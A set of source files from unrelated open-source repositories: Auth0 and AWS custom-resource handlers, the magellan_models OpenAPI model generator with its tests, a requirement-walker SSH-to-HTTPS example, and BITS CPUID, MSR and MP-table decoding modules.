return resource['id']
page += 1
if page > PAGE_LIMIT:
break
time.sleep(1)
return None
def get_application(self, client_id, fields=None, include_fields=True):
"""Get an application (client) from auth0 by id"""
return self.auth0.clients.get(id=client_id, fields=fields, include_fields=include_fields)
def add_to_connection(self, conn_id, app_id):
"""Enable a connection for an application"""
connection = self.auth0.connections.get(conn_id, ['enabled_clients'])
# add the app_id to the list of enabled_clients
if app_id not in connection['enabled_clients']:
connection['enabled_clients'].append(app_id)
# update the connection
self.auth0.connections.update(conn_id, {'enabled_clients': connection['enabled_clients']})
def remove_from_connection(self, conn_id, app_id):
"""Disable a connection for an application"""
connection = self.auth0.connections.get(conn_id, ['enabled_clients'])
# remove the app_id to the list of enabled_clients
if app_id in connection['enabled_clients']:
connection['enabled_clients'].remove(app_id)
# update the connection
self.auth0.connections.update(conn_id, {'enabled_clients': connection['enabled_clients']})
def update_application(self, client_id, **kwargs):
"""Update an Auth0 Application (Client)
Args:
client_id (str): ID of the Auth0 Application (client)
**kwargs (dict): configuration of the auth0 client
"""
client = self.auth0.clients.update(client_id, kwargs)
return client['client_id']
def delete_application(self, app_id):
"""Delete an application
Args:
app_id (str): The ID of the application to delete
"""
return self.auth0.clients.delete(app_id)
def delete_grant(self, grant_id):
"""Delete a grant
Args:
grant_id (str): The ID of the grant to delete
"""
return self.auth0.client_grants.delete(grant_id)
def delete_api(self, api_id):
"""Delete an api
Args:
api_id (str): The ID of the api to delete
"""
return self.auth0.resource_servers.delete(api_id)
def delete_resource(self, resource_id, client_id):
"""Delete a resource
Deletes the resource server, client, and client grant in the resource
Args:
resource_id (str): The ID of the resource_server to delete
client_id (str): The ID of the client to delete
"""
self.auth0.clients.delete(client_id)
# Deleting a client also deletes the grants associated with it
self.auth0.resource_servers.delete(resource_id)
```
#### File: aws-auth0-custom-resource/src/grant.py
```python
import logging
import boto3
from crhelper import CfnResource
from auth0.v3.exceptions import Auth0Error
from .utils import config
from .lambdatype import LambdaDict, LambdaContext
from .validation.grant import auth0Validator
logger = logging.getLogger('aws-auth0-cr')
secrets_client = boto3.client('secretsmanager')
def create(event: LambdaDict, _: LambdaContext, helper: CfnResource) -> str:
"""
Create a client grant with the given name and audience
"""
props = event['ResourceProperties']
validated = auth0Validator.validated(props)
if not validated:
raise Exception(auth0Validator.errors)
provider = config.get_provider(props.get('Tenant'))
grant_id = provider.create_grant(**validated)
helper.Data['GrantId'] = grant_id
return grant_id
def update(event, context, helper): # pylint: disable=unused-argument
"""
update a client grant
Updates don't really happen. The reason this might change is that the
user might update a logical ID or reference for the grant. When this
happens we really want to re-run create because we assume the original
API or Application were removed.
"""
try:
grant_id = create(event, context, helper)
except Auth0Error as err:
logger.error(err)
if err.status_code != 409:
raise err
grant_id = event['PhysicalResourceId']
helper.Data['GrantId'] = grant_id
return grant_id
def delete(event, context, helper): # pylint: disable=unused-argument
"""delete a client grant"""
logger.info(event)
props = event['ResourceProperties']
provider = config.get_provider(props.get('Tenant'))
try:
# deleting a grant id that doesn't exist does not raise exception
# see e2e/test_errors.py
provider.delete_grant(event['PhysicalResourceId'])
except Auth0Error as err:
logger.error(err)
if 'Path validation error' in err.message:
logger.error('physical resource id is not a \
valid grant. Assuming this failed to create.')
return
raise
```
#### File: src/utils/secret.py
```python
import base64
import logging
from botocore.exceptions import ClientError
logger = logging.getLogger('aws-auth0-cr')
def get_muxed_secret(client, secret_id, stage='AWSCURRENT'):
"""
Get a secret from secrets manager with the value
decoded to SecretValue
"""
try:
get_secret_value_response = client.get_secret_value(
SecretId=secret_id,
VersionStage=stage
)
# Decrypts secret using the associated KMS CMK.
# Depending on whether the secret is a string or binary,
# one of these fields will be populated.
if 'SecretString' in get_secret_value_response:
secret = get_secret_value_response['SecretString']
else:
secret = base64.b64decode(
get_secret_value_response['SecretBinary'])
# normlized secret
get_secret_value_response['SecretValue'] = secret
return get_secret_value_response
except ClientError as err:
if err.response['Error']['Code'] == 'DecryptionFailureException':
logger.error('Unable to decrypt secret: %s', err.response)
raise err
if err.response['Error']['Code'] == 'InternalServiceErrorException':
logger.error(
'Internal server error in secrets manager %s', err.response)
raise err
if err.response['Error']['Code'] == 'InvalidParameterException':
logger.error('Invalid parameter error: %s', err.response)
raise err
if err.response['Error']['Code'] == 'InvalidRequestException':
logger.error(
'Invalid request for state of secret error: %s', err.response)
raise err
if err.response['Error']['Code'] == 'ResourceNotFoundException':
logger.error('Resource not found error %s', err.response)
raise err
logger.error('Error with secretsmanager API call: %s', err.response)
raise err
def get_secret(client, secret_id, stage='AWSCURRENT'):
"""Get a secret value from secrets manager"""
resource = get_muxed_secret(client, secret_id, stage)
return resource['SecretValue']
```
#### File: src/validation/application.py
```python
import json
from cerberus import Validator
from . import AuthnValidator, to_bool
APP_TYPE_MAP = {
'spa': 'spa',
'native': 'native',
'm2m': 'non_interactive',
'web': 'regular_web',
}
AUTH_METHOD_MAP = {
'None': 'none',
'Post': 'client_secret_post',
'Basic': 'client_secret_basic'
}
def to_auth_method_type(val):
"""coerce the auth method to the api value"""
if not val in AUTH_METHOD_MAP:
raise ValueError(
f'method should be one of {",".join(AUTH_METHOD_MAP.keys())}'
)
return AUTH_METHOD_MAP[val]
def to_app_type(val):
"""coerce the app type value"""
if val not in APP_TYPE_MAP:
raise ValueError(
'type should be one of {}'.format(','.join(APP_TYPE_MAP.keys()))
)
return APP_TYPE_MAP[val]
# pylint: disable=invalid-name
auth0 = {
'tenant': {
'type': 'string',
'readonly': True,
'empty': False,
},
'service_token': {
'type': 'string',
'readonly': True,
'empty': False,
},
'name': {
'type': 'string',
'required': True,
'empty': False,
},
'description': {
'type': 'string',
'required': True,
'empty': False,
},
'logo_uri': {'type': 'string'},
'type': {
'rename': 'app_type',
'required': True,
'type': 'string',
'allowed': ['spa', 'native', 'non_interactive', 'regular_web'],
'coerce': (to_app_type),
},
'token_endpoint_auth_method': {
'type': 'string',
'allowed': ['None', 'Post', 'Basic'],
# 'default': 'None',
'coerce': (to_auth_method_type),
},
'auth_method': {
'rename': 'token_endpoint_auth_method',
'type': 'string',
},
'login_u_r_i': {
'rename': 'initiate_login_uri',
'type': 'string',
},
'callback_urls': {
'rename': 'callbacks',
'type': 'list',
'schema': {'type': 'string'},
},
'logout_urls': {
'rename': 'allowed_logout_urls',
'type': 'list',
'schema': {'type': 'string'}
},
'web_origins': {
'type': 'list',
'schema': {'type': 'string'}
},
'allowed_origins': {
'type': 'list',
'schema': {'type': 'string'}
},
'j_w_t_configuration': {
'rename': 'jwt_configuration',
'schema': {
'lifetime_in_seconds': {'type': 'integer', 'default': 3600, 'coerce': int},
'scopes': {'type': 'dict'},
'alg': {'type': 'string'},
}
},
# SPA/Web/Native only
'refresh_token': {
'type': 'dict',
'dependencies': 'grant_types',
'schema': {
'rotation_type': {
'type': 'string',
'allowed': ['rotating', 'non-rotating'],
},
'expiration_type': {
'type': 'string',
'allowed': ['expiring', 'non-expiring'],
},
'token_lifetime': {
'type': 'integer',
'min': 1800,
'max': 2592000,
'coerce': int
},
}
},
# # Native
'native_social_login': {
'type': 'dict',
'dependencies': {'type': ['native']},
'schema': {
'apple': {
'type': 'dict',
},
'facebook': {
'type': 'dict',
},
}
},
# # Advanced : Danger Zone
'client_metadata': {
'type': 'dict',
'default': {},
},
'mobile': {
'type': 'dict',
'schema': {
'android': {
'type': 'dict',
'schema': {
'app_package_name': {
'type': 'string'
},
'sha256_cert_fingerprints': {
'type': 'list'
},
}
},
'ios': {
'type': 'dict',
'schema': {
'team_id': {
'type': 'string'
},
'app_bundle_identifier': {
'type': 'string'
},
},
}
},
},
'allowed_clients': {
'type': 'list'
},
'oidc_conformant': {
'type': 'boolean',
'coerce': to_bool
},
# 'cross_origin_loc': '', # Cross-Origin Verification Fallback
# M2M Only
'grant_types': {
'type': 'list',
'anyof': [
{
'dependencies': {'type': 'non_interactive'},
'allowed': [
'client_credentials',
'implicit',
'authorization_code',
'refresh_token',
'password',
'mfa',
],
},
{
'dependencies': {'type': ['spa', 'native', 'regular_web']},
'allowed': [
'implicit',
'authorization_code',
'refresh_token',
'password',
'mfa',
],
},
],
},
'allow_ad_groups': {
'readonly': True,
'type': 'list',
'dependencies': {'type': ['spa', 'native', 'regular_web']},
'schema': {
'type': 'string',
}
},
# custom-resource specific
'connections': {
'readonly': True,
'type': 'list',
'schema': {
'type': 'string'
}
}
}
tags_schema = {
'ApplicationID': {
'type': 'string',
},
'AllowAdGroups': {
'type': 'string',
'coerce': (lambda x: json.dumps(x, separators=(',', ':'))),
'maxlength': 255,
}
}
application_defaults = {
'non_interactive': {
'grant_types': ['client_credentials'],
'token_endpoint_auth_method': 'client_secret_post',
},
'spa': {
'grant_types': ['implicit', 'authorization_code', 'refresh_token'],
'token_endpoint_auth_method': 'none',
}
}
def with_defaults(document):
"""a function to return defaults on an application type"""
app_type = document['app_type']
if app_type not in application_defaults:
return {}
return application_defaults[app_type]
auth0Validator = AuthnValidator(
auth0,
with_defaults=with_defaults,
)
tagsValidator = Validator(
tags_schema,
purge_unknown=True,
)
``` |
{
"source": "3mcloud/magellan-models",
"score": 3
} |
#### File: magellan_models/interface/constant_magellan_response.py
```python
from __future__ import annotations
from typing import TYPE_CHECKING
from magellan_models.interface.magellan_response import MagellanResponse
from magellan_models.config import MagellanConfig
from magellan_models.exceptions import MagellanRuntimeException
if TYPE_CHECKING:
from magellan_models.interface.abstract_api_model import AbstractApiModel
class ConstantMagellanResponse(MagellanResponse):
"""This is the immutable MagellanResponse returned by `query` calls"""
def __init__( # pylint: disable=too-many-arguments
self,
url_path: str,
raw_params: dict,
Model: AbstractApiModel,
config: MagellanConfig,
limit: int = None,
**kwargs
) -> ConstantMagellanResponse:
"""Generates a new ConstantMagellanResponse
Args:
url_path (str): The base path to start with (See MagellanResponse)
raw_params (dict): The raw params passed to `query`
Model (AbstractApiModel): A MagellanModel
config (MagellanConfig): A MagellanConfig associated with the model
limit (int, optional): The limit for the number of responses. Defaults to None.
Returns:
ConstantMagellanResponse: [description]
"""
self.raw_params = raw_params
super().__init__(url_path, Model, config, limit, **kwargs)
def process_next_page_of_results(self):
"""Processes the next page of results using the internal parameters"""
if self.next_url is None or self.iteration_is_complete():
# Done iterating, next_url is None when we have no more results to get
return
header_and_args = self.__config__.create_header(**self.kwargs)
header = header_and_args[0]
if len(self) == 0: # first call
route = self.next_url
resp = self.get_request(route, self.raw_params, header)
self.iterate_through_response(resp)
else:
resp = self.get_request(url=self.next_url, headers=header)
self.iterate_through_response(resp)
self.next_url = self.__config__.get_next_link_from_resp(resp)
self.__meta_data__ = self.__config__.get_meta_data_from_resp(resp)
return
def where(self, **kwargs):
raise MagellanRuntimeException("You can't chain on a ConstantMagellanResponse")
def __getattr__(self, name):
raise AttributeError()
def limit(self, new_limit):
raise MagellanRuntimeException(
"You can't set a new limit on a ConstantMagellanResponse"
)
```
#### File: magellan_models/model_generator/generate_from_spec.py
```python
from typing import Tuple
import inflection
from magellan_models.config import MagellanConfig
from .openapi_parser import (
get_resource_mapping,
parse_resource_names_and_other_routes_from_mapping,
)
from .model_parser import get_model_representation
from .generate_dynamic_model import generate_model
from .generate_nonrest_functions import generate_func_for_route
from .generic_functions_generator import get_generic_function
def generate_from_spec(
spec: dict, configuration: MagellanConfig
) -> Tuple[dict, dict, MagellanConfig]:
"""Generates Models from an OpenAPI specification json body
These models are defined via the template file under templates
and inherit from the abstractApiModel class
upon generation, models can be imported via src.models.endpoint_models
Arguments:
spec {Dict} -- Dict representation of the open api specification json
configuration {MagellanConfig} -- Configuration instance containing user settings
Output:
tuple(dict, dict, MagellanConfig)
First dict: str => AbstractApiModel mapping of class names to Models
Second dict: str => function, a mapping of non-Model functions that are accessible.
MagellanConfig: configuration instance linked to all Models and Functions generated
"""
resource_mapping = get_resource_mapping(spec)
resource_names, other_routes = parse_resource_names_and_other_routes_from_mapping(
resource_mapping, configuration.id_separator
)
model_representations = []
model_names = []
for resource_name in resource_names:
model_names.append(inflection.camelize(inflection.singularize(resource_name)))
model_representations.append(
get_model_representation(spec, resource_name, configuration)
)
model_definitions = {}
for repres in model_representations:
model_definitions[repres["class_name"]] = generate_model(
repres, model_names, model_definitions, configuration
)
functional_routes = {}
for route in other_routes:
func_name, function = generate_func_for_route(route, configuration)
functional_routes[func_name] = function
functional_routes["_generic_api_function"] = get_generic_function(configuration)
if configuration.print_on_init:
print("Completed Model and Function Generation")
print("The following Models were generated:")
for key in model_definitions:
print(key)
print("The following Functions were generated:")
for key in functional_routes:
print(key)
print(
"You can access https://github.mmm.com/MMM/magellan/tree/master/docs for the latest Documentation" # pylint: disable=line-too-long
)
return (model_definitions, functional_routes, configuration)
```
#### File: tests/initializer_tests/test_init_with_endpoint.py
```python
import pytest
from magellan_models import initialize_with_endpoint
from tests.helper import get_testing_spec
def test_init_with_endpoint_works(requests_mock):
example_path = "https://localhost/api/v1/swagger.yaml"
requests_mock.get(example_path, status_code=200,
json=get_testing_spec())
models, funcs, conf = initialize_with_endpoint(example_path)
assert models is not None
assert funcs is not None
assert conf is not None
assert requests_mock.called
def test_init_with_endpoint_throws_on_error(requests_mock):
example_path = "https://localhost/api/v1/swagger.yaml"
requests_mock.get(example_path, status_code=9000,
json=get_testing_spec())
with pytest.raises(Exception):
initialize_with_endpoint(example_path)
assert requests_mock.called
```
#### File: tests/interface_tests/test_constant_magellan_response.py
```python
from magellan_models.interface import ConstantMagellanResponse
from magellan_models.exceptions import MagellanRuntimeException
import pytest
def test_const_mag_resp_gets_further_pages_to_hit_limit(
requests_mock, generated_models
):
Faction = generated_models.get("Faction")
config = Faction.configuration()
route = f"{config.api_endpoint}/{Faction.resource_name()}"
generated_params = "?"
payload_entities = []
for i in range(20):
payload_entities.append(
{
"attributes": {
"id": i + 1,
"title": f"Fake Data {i}",
"description": "Fake Data element",
"tags": ["Fake", "Data"],
}
}
)
first_page = {
"data": payload_entities[0:10],
"meta": {"entity_count": 20},
"links": {"next": route + generated_params + "page2"},
}
second_page = {"data": payload_entities[10:19], "meta": {"entity_count": 20}}
requests_mock.get(route + generated_params, status_code=200, json=first_page)
requests_mock.get(
route + generated_params + "page2", status_code=200, json=second_page
)
mag_resp = ConstantMagellanResponse(
url_path=route, Model=Faction, config=config, limit=15, raw_params={}
)
assert requests_mock.called
assert requests_mock.call_count == 1 # Shouldn't hit second page until needed
assert len(mag_resp) == 10
count = 0
for elem in mag_resp:
count += 1
assert requests_mock.call_count == 2
assert len(mag_resp) == 15
def test_const_mag_resp_exceptions_on_where_and_limit(requests_mock, generated_models):
Faction = generated_models.get("Faction")
config = Faction.configuration()
route = f"{config.api_endpoint}/{Faction.resource_name()}"
generated_params = "?"
payload_entities = []
for i in range(20):
payload_entities.append(
{
"attributes": {
"id": i + 1,
"title": f"Fake Data {i}",
"description": "Fake Data element",
"tags": ["Fake", "Data"],
}
}
)
first_page = {
"data": payload_entities[0:10],
"meta": {"entity_count": 20},
"links": {"next": route + generated_params + "page2"},
}
requests_mock.get(route + generated_params, status_code=200, json=first_page)
mag_resp = ConstantMagellanResponse(
url_path=route, Model=Faction, config=config, limit=9, raw_params={}
)
assert requests_mock.called
assert requests_mock.call_count == 1 # Shouldn't hit second page until needed
assert len(mag_resp) == 9
with pytest.raises(MagellanRuntimeException):
mag_resp.where(id=12)
with pytest.raises(MagellanRuntimeException):
mag_resp.limit(5)
def test_const_mag_resp_returns_when_next_page_is_none(requests_mock, generated_models):
Faction = generated_models.get("Faction")
config = Faction.configuration()
route = f"{config.api_endpoint}/{Faction.resource_name()}"
generated_params = "?"
payload_entities = []
for i in range(20):
payload_entities.append(
{
"attributes": {
"id": i + 1,
"title": f"Fake Data {i}",
"description": "Fake Data element",
"tags": ["Fake", "Data"],
}
}
)
first_page = {"data": payload_entities[0:10], "meta": {"entity_count": 20}}
requests_mock.get(route + generated_params, status_code=200, json=first_page)
mag_resp = ConstantMagellanResponse(
url_path=route, Model=Faction, config=config, limit=9, raw_params={}
)
assert requests_mock.called
assert requests_mock.call_count == 1 # Shouldn't hit second page until needed
assert mag_resp.next_url is None
assert mag_resp.process_next_page_of_results() is None
``` |
{
"source": "3mcloud/requirement-walker",
"score": 3
} |
#### File: requirement-walker/examples/sst_to_https.py
```python
import re
import logging
import subprocess
from functools import lru_cache
from shutil import which
# 3rd Party
from requirement_walker import walk
# Owned
# Used to pull out the ssh domain to see if we have access to it.
EXTRACT_SSH_DOMAIN = re.compile(r"(?<=ssh://)(.*?)(?=/)")
# Used to pull out the leading ssh part so we can swap it with https.
MATCH_SSH = re.compile(r'ssh://git@')
LOGGER = logging.getLogger(__name__)
@lru_cache(maxsize=32)
def has_ssh(ssh_domain: str) -> bool:
"""
Check that the user has ssh access to the given ssh domain
First it will verify if ssh is installed in $PATH
then check if we can authenticate to ssh_domain
over ssh. Returns False if either of these are untrue
Example ssh_domain: [email protected]
"""
result = None
if which('ssh') is not None:
result = subprocess.Popen(['ssh', '-Tq', ssh_domain, '2>', '/dev/null'])
result.communicate()
if not result or result.returncode == 255:
return False
return True
def ssh_check_or_https(input_file_path: str, output_file_path: str) -> None:
"""
Given a path to q requirements file, will look for SSH requirements. If this terminal
does not have access to that SSH domain then it will change the requirement to HTTPs.
Can handle referencing other requirement files BUT will output all requirements to a SINGLE
requirement file.
ARGS:
input_file_path (str): Path to the inputted requirements.txt file.
output_file_path (str): Path to output all the requirements to.
All requirements will be outputted
"""
entries = []
for entry in walk(input_file_path):
if entry.requirement.url:
ssh_domain = EXTRACT_SSH_DOMAIN.search(entry.requirement.url)
if ssh_domain and not has_ssh(ssh_domain.group(1)):
new_url = MATCH_SSH.sub('https://', entry.requirement.url)
LOGGER.info(
"No access to domain %s:\n"
" Swapping:\n"
" - %s\n"
" For:\n"
" - %s\n", ssh_domain.group(1), entry.requirement.url, new_url)
entry.requirement.url = new_url
entries.append(entry)
with open(output_file_path, 'w') as req_file:
req_file.writelines((str(entry) + '\n' for entry in entries))
``` |
{
"source": "3mdeb/bits",
"score": 2
} |
#### File: python/bits/platformbase.py
```python
from __future__ import print_function
import bits
import functools
import inspect
import operator
import textwrap
_wrapper = textwrap.TextWrapper(width=78, initial_indent=' ', subsequent_indent=' ')
class CPUID(object):
# Subclasses must define a "leaf" field as part of the class definition.
def __init__(self, regs):
self.regs = regs
@classmethod
def read(cls, apicid, subleaf=0):
r = cls(bits.cpuid(apicid, cls.leaf, subleaf))
r.apicid = apicid
r.subleaf = subleaf
return r
# FIXME: This allows getting subleaves, but requires having an instance of
# the class first, which means always reading subleaf 0 and then the
# desired subleaf.
def __getitem__(self, subleaf):
return self.read(self.apicid, subleaf)
def __eq__(self, other):
return self.regs == other.regs
def __ne__(self, other):
return self.regs != other.regs
def __str__(self):
T = type(self)
fields = dict((regnum, {}) for regnum in range(len(self.regs._fields)))
properties = list()
for field_name in dir(T):
field = getattr(T, field_name)
if isinstance(field, cpuidfield):
fields[field.reg][field_name] = field
elif isinstance(field, property):
properties.append(field_name)
heading = "APIC ID {:#x} -- ".format(self.apicid)
heading += "CPUID (EAX={:#x}".format(self.leaf)
if self.subleaf:
heading += ", ECX={:#x}".format(self.subleaf)
heading += ")"
s = heading + "\n" + "-"*len(heading) + "\n"
doc = inspect.getdoc(self)
if doc:
s += doc + "\n"
def format_range(msb, lsb):
if msb == lsb:
return "[{}]".format(msb)
return "[{}:{}]".format(msb, lsb)
def format_field(msb, lsb, value):
"""Field formatter that special-cases single bits and drops the 0x"""
if msb == lsb:
return str(value)
return "{:#x}".format(value)
for regnum, regname in enumerate(self.regs._fields):
s += "\n"
s1 = " {}={:#010x} ".format(regname, self.regs[regnum])
s += s1
inner = ("\n " + " " * len(s1)).join(
"{}{} {}={}".format(regname, format_range(field.msb, field.lsb), field_name, format_field(field.msb, field.lsb, getattr(self, field_name)))
for field_name, field in sorted(fields[regnum].iteritems(), key=(lambda (k, v): v.lsb))
)
if inner:
s += " {}".format(inner)
properties = sorted(set(properties))
if len(properties):
s += "\n Attributes derived from one or more fields:"
for property_name in properties:
s += '\n'
temp = "{}={}".format(property_name, getattr(self, property_name))
s += '\n'.join(_wrapper.wrap(temp))
return s
class cpuidfield(property):
def __init__(self, reg, msb, lsb, doc="Bogus"):
self.reg = reg
self.msb = msb
self.lsb = lsb
max_value = (1 << (msb - lsb + 1)) - 1
field_mask = max_value << lsb
def getter(self):
return (self.regs[reg] & field_mask) >> lsb
super(cpuidfield, self).__init__(getter, doc=doc)
def make_CPUIDS(classes):
class CPUIDS(object):
leafs = dict()
def __init__(self, apicid):
self.apicid = apicid
def __getitem__(self, leaf_in):
l = self.leafs.get(leaf_in)
if l is not None:
return getattr(self, l)
class DYNAMIC_LEAF_(CPUID):
__doc__ = "Dynamic CPUID leaf {:#X}".format(leaf_in)
leaf = leaf_in
DYNAMIC_LEAF_.__name__ += "{:X}".format(leaf_in)
return DYNAMIC_LEAF_.read(self.apicid)
def __iter__(self):
for leaf_num in sorted(self.leafs.keys()):
yield self[leaf_num]
for c in classes:
assert CPUIDS.leafs.get(c.leaf) is None, "Internal error: Duplicate CPUID leaf {:#X}".format(c.leaf)
def getter(inner_c, self):
return inner_c.read(self.apicid)
setattr(CPUIDS, c.__name__, property(functools.partial(getter, c), None))
CPUIDS.leafs[c.leaf] = c.__name__
return CPUIDS
class MSR(object):
# Subclasses must define a "addr" field as part of the class definition.
def __init__(self, value=0):
self.value = value
def __eq__(self, other):
return self.value == other.value
def __ne__(self, other):
return self.value != other.value
@classmethod
def rdmsr(cls, apicid):
r = cls(bits.rdmsr(apicid, cls.addr))
r.apicid = apicid
return r
def wrmsr(self, apicid=None):
if apicid is None:
apicid = self.apicid
bits.wrmsr(apicid, self.addr, self.value)
def __str__(self):
T = type(self)
fields = {}
properties = []
for field_name in dir(T):
field = getattr(T, field_name)
if isinstance(field, msrfield):
fields[field_name] = field
elif isinstance(field, property):
properties.append(field_name)
heading = "APIC ID {:#x} -- ".format(self.apicid)
heading += "MSR {:#x}".format(self.addr)
s = heading + "\n" + "-"*len(heading) + "\n"
doc = inspect.getdoc(self)
if doc:
s += doc + "\n\n"
s += "MSR {:#x}".format(self.addr)
if self.value is None:
s += ' value=GPF'
return s
s += ' value={:#x}'.format(self.value)
for field_name, field in sorted(fields.iteritems(), key=(lambda (k, v): v.lsb)):
s += '\n'
temp = "[{}:{}] {}={:#x}".format(field.msb, field.lsb, field_name, getattr(self, field_name))
# FIXME: check wrapper, and use a hanging indent to wrap the docstring to len(temp)+1
if field.__doc__:
temp += " " + inspect.getdoc(field)
s += '\n'.join(_wrapper.wrap(temp))
if properties:
s += "\n Attributes derived from one or more fields:"
for property_name in sorted(properties):
s += '\n'
temp = "{}={}".format(property_name, getattr(self, property_name))
# FIXME: check wrapper, get the property documentation string if any, and use a hanging indent to wrap the docstring to len(temp)+1
s += '\n'.join(_wrapper.wrap(temp))
return s
class msrfield(property):
def __init__(self, msb, lsb, doc=None):
self.msb = msb
self.lsb = lsb
max_value = (1 << (msb - lsb + 1)) - 1
field_mask = max_value << lsb
def getter(self):
return (self.value & field_mask) >> lsb
def setter(self, value):
if value > max_value:
if msb == lsb:
field = "[{0}]".format(msb)
else:
field = "[{0}:{1}]".format(msb, lsb)
raise OverflowError("Value {value:#x} too big for MSR {self.addr:#x} field {field}".format(**locals()))
self.value = (self.value & ~field_mask) | (value << lsb)
super(msrfield, self).__init__(getter, setter, doc=doc)
def make_MSRS(classes):
class MSRS(object):
addrs = dict()
def __init__(self, apicid):
self.apicid = apicid
def __getitem__(self, addr_in):
addr = self.addrs.get(addr_in)
if addr is not None:
return getattr(self, addr)
class DYNAMIC_MSR_(MSR):
__doc__ = "Dynamic MSR addr {:#x}".format(addr_in)
addr = addr_in
DYNAMIC_MSR_.__name__ += "{:x}".format(addr_in)
return DYNAMIC_MSR_.rdmsr(self.apicid)
def __iter__(self):
for addr in sorted(self.addrs.keys()):
yield self[addr]
for c in classes:
if not hasattr(c, "addr"):
print("Internal error: MSR addr missing {}".format(c.__name__))
assert MSRS.addrs.get(c.addr) is None, "Internal error: Duplicate MSR addr {:#x}".format(c.addr)
def getter(inner_c, self):
return inner_c.rdmsr(self.apicid)
def setter(inner_c, self, value):
inner_c(getattr(value, "value", value)).wrmsr(self.apicid)
setattr(MSRS, c.__name__, property(functools.partial(getter, c), functools.partial(setter, c)))
MSRS.addrs[c.addr] = c.__name__
return MSRS
```
#### File: bits/python/bootmenu.py
```python
from __future__ import print_function
import bits
import ttypager
created_boot_menu = False
try:
import efi
boot_str = "{}-bit EFI".format(str(efi.ptrsize * 8))
have_efi = True
except ImportError as e:
boot_str = "32-bit BIOS"
have_efi = False
def generate_boot_menu():
global created_boot_menu, boot_str
if created_boot_menu:
return
cfg = ""
cfg += 'menuentry "{} boot detected" {{\n'.format(boot_str)
cfg += """ py 'import bootmenu; bootmenu.callback()'\n"""
cfg += '}\n'
if have_efi:
cfg += 'menuentry "Exit to EFI" {\n'
cfg += """ py 'import efi; efi.exit()'\n"""
cfg += '}\n'
bits.pyfs.add_static("bootmenu.cfg", cfg)
created_boot_menu = True
def callback():
with ttypager.page():
print("{} boot detected".format(boot_str))
print("Tests and other menu entries tailored for this environment")
```
#### File: bits/python/mptable.py
```python
from __future__ import print_function
import bits
import bitfields
import ctypes
import struct
import unpack
import testsuite
import ttypager
import sys
valid_address_ranges = [
(0x9FC00, 0x400),
(0xF0000, 0x10000),
]
bad_address_ranges = [
(0xE0000, 0x10000),
]
def find_mp_table():
if sys.platform == "BITS-EFI":
import efi
return efi.system_table.ConfigurationTableDict.get(efi.MPS_TABLE_GUID)
address_ranges = valid_address_ranges + bad_address_ranges
bda_address = 0x400
ebda_address = ctypes.c_uint16.from_address(bda_address + 0x14).value << 4
if ebda_address:
address_ranges.insert(0, (ebda_address, 0x400))
for address, size in address_ranges:
mem = bits.memory(address, size)
for offset in range(0, size, 16):
signature = (ctypes.c_char * 4).from_address(address + offset).value
if signature == "_MP_":
length = ctypes.c_ubyte.from_address(address + offset + 8).value
if length == 1:
csum = sum(map(ord, mem[offset:offset+16])) & 0xff
if csum == 0:
return address + offset
return None
class MPTable(unpack.Struct):
"""Find and decode the MP Table."""
def __new__(cls):
offset = find_mp_table()
if offset is None:
return None
mp = super(MPTable, cls).__new__(cls)
mp._floating_pointer_memory = bits.memory(offset, 0x10)
return mp
def __init__(self):
super(MPTable, self).__init__()
u = unpack.Unpackable(self._floating_pointer_memory)
self.add_field('floating_pointer', FloatingPointer(u))
self._base_header_memory = bits.memory(self.floating_pointer.physical_address_pointer, 44)
u = unpack.Unpackable(self._base_header_memory)
self.add_field('header', Header(u), "\n\n{!r}")
self._base_table_memory = bits.memory(self.floating_pointer.physical_address_pointer, self.header.base_table_length)
u = unpack.Unpackable(self._base_table_memory)
u.skip(44)
self.add_field('base_structures', unpack.unpack_all(u, _base_structures), unpack.format_each("\n\n{!r}"))
self._extended_table_memory = bits.memory(self.floating_pointer.physical_address_pointer + self.header.base_table_length, self.header.extended_table_length)
u = unpack.Unpackable(self._extended_table_memory)
self.add_field('extended_structures', unpack.unpack_all(u, _extended_structures), unpack.format_each("\n\n{!r}"))
class FloatingPointer(unpack.Struct):
def __init__(self, u):
super(FloatingPointer, self).__init__()
self.raw_data = u.unpack_peek_rest()
self.add_field('anchor_string', u.unpack_one("4s"))
self.add_field('physical_address_pointer', u.unpack_one("<I"))
self.add_field('length', u.unpack_one("B"))
self.add_field('spec_revision', u.unpack_one("B"))
self.add_field('checksum', u.unpack_one("B"))
self.add_field('mp_feature_info_1', u.unpack_one("B"))
self.add_field('mp_feature_info_2', u.unpack_one("B"))
self.add_field('multiple_clock_sources', bool(bitfields.getbits(self.mp_feature_info_2, 6)), "mp_feature_info_2[6]={}")
self.add_field('imcrp_present', bool(bitfields.getbits(self.mp_feature_info_2, 7)), "mp_feature_info_2[7]={}")
self.add_field('mp_feature_info_3', u.unpack_one("B"))
self.add_field('mp_feature_info_4', u.unpack_one("B"))
self.add_field('mp_feature_info_5', u.unpack_one("B"))
if not u.at_end():
self.add_field('data', u.unpack_rest())
class Header(unpack.Struct):
def __init__(self, u):
super(Header, self).__init__()
self.raw_data = u.unpack_peek_rest()
self.add_field('signature', u.unpack_one("4s"))
self.add_field('base_table_length', u.unpack_one("<H"))
self.add_field('spec_revision', u.unpack_one("B"))
self.add_field('checksum', u.unpack_one("B"))
self.add_field('oem_id', u.unpack_one("8s"))
self.add_field('product_id', u.unpack_one("12s"))
self.add_field('oem_table_pointer', u.unpack_one("<I"))
self.add_field('oem_table_size', u.unpack_one("<H"))
self.add_field('entry_count', u.unpack_one("<H"))
self.add_field('local_apic_address', u.unpack_one("<I"))
self.add_field('extended_table_length', u.unpack_one("<H"))
self.add_field('extended_table_checksum', u.unpack_one("B"))
u.skip(1) # reserved byte
if not u.at_end():
self.add_field('data', u.unpack_rest())
class MpBaseStructure(unpack.Struct):
def __new__(cls, u):
t = u.unpack_peek_one("B")
if cls.mp_structure_type is not None and t != cls.mp_structure_type:
return None
return super(MpBaseStructure, cls).__new__(cls)
def __init__(self, u):
super(MpBaseStructure, self).__init__()
self.start_offset = u.offset
entry_type = u.unpack_peek_one("B")
if entry_type == 0:
length = 20
else:
length = 8
self.u = u.unpack_unpackable(length)
self.raw_data = self.u.unpack_peek_rest()
self.add_field('entry_type', self.u.unpack_one("B"))
self.add_field('length', length)
def fini(self):
if not self.u.at_end():
self.add_field('data', self.u.unpack_rest())
del self.u
class Processor(MpBaseStructure):
mp_structure_type = 0
def __init__(self, u):
super(Processor, self).__init__(u)
u = self.u
self.add_field('local_apic_id', u.unpack_one("B"))
self.add_field('local_apic_version', u.unpack_one("B"))
self.add_field('cpu_flags', u.unpack_one("B"))
